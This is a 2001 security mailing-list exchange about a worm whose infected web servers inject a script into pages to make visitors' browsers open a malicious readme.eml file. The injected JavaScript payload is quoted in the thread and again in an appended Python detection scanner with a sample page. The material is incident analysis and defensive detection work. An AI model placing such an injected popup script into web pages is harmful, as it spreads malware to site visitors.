Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltman@columbia.edu)
Date: 09/19/01


Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman <jaltman@columbia.edu>
To: "Davis, Matt" <matt.davis@countryfinancial.com>
Subject: Re: [unisog] Some more details on the worm
Message-ID: <CMM.0.90.4.1000860891.jaltman@watsun.cc.columbia.edu>


.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called

  \WINDOWS\system32\thumbvw.exe

being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davis@countryfinancial.com
>

 Jeffrey Altman * Sr.Software Designer
 The Kermit Project @ Columbia University
 http://www.kermit-project.org/
 kermit-support@kermit-project.org

 C-Kermit 8.0 Beta available, includes Secure Telnet and FTP using Kerberos, SRP, and OpenSSL. SSH soon to follow.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
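Added example, not part of the thread: a small scanner that flags the injected script Matt quotes above by looking for a window.open() call whose target is a .eml file and whose top/left features push the popup off-screen. The OFFSCREEN_PX threshold, the Finding type and the sample page are constructed assumptions for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import List

# Any <script> block, body captured (case-insensitive, may span lines).
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(?P<body>.*?)</script>", re.IGNORECASE | re.DOTALL)

# window.open("<something>.eml", <name>, "<features>") tolerant of quote style and
# line breaks between the arguments, as in the snippet quoted in the thread.
EML_OPEN = re.compile(
    r"window\.open\(\s*[\"']([^\"']*\.eml)[\"']\s*,\s*[^,]*,\s*[\"']([^\"']*)[\"']",
    re.IGNORECASE,
)

# Assumption: a popup positioned this far from the origin is meant to be hidden.
OFFSCREEN_PX = 2000


@dataclass
class Finding:
    target: str      # the .eml resource the page tries to open
    offscreen: bool  # True when top= or left= places the window out of view
    features: str    # raw third argument of window.open()


def popup_is_offscreen(features: str) -> bool:
    """True if top= or left= in the feature string is at or beyond OFFSCREEN_PX."""
    for key in ("top", "left"):
        m = re.search(rf"\b{key}=(\d+)", features)
        if m and int(m.group(1)) >= OFFSCREEN_PX:
            return True
    return False


def scan_html(html: str) -> List[Finding]:
    """Return one Finding per window.open() of a .eml file inside any <script> block."""
    findings: List[Finding] = []
    for block in SCRIPT_BLOCK.finditer(html):
        for m in EML_OPEN.finditer(block.group("body")):
            target, features = m.group(1), m.group(2)
            findings.append(Finding(target, popup_is_offscreen(features), features))
    return findings


# Constructed sample: one benign popup and one injected .eml popup as quoted above.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script language="JavaScript">window.open("help.html", null, "resizable=yes")</script>
<script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>
</body></html>"""
```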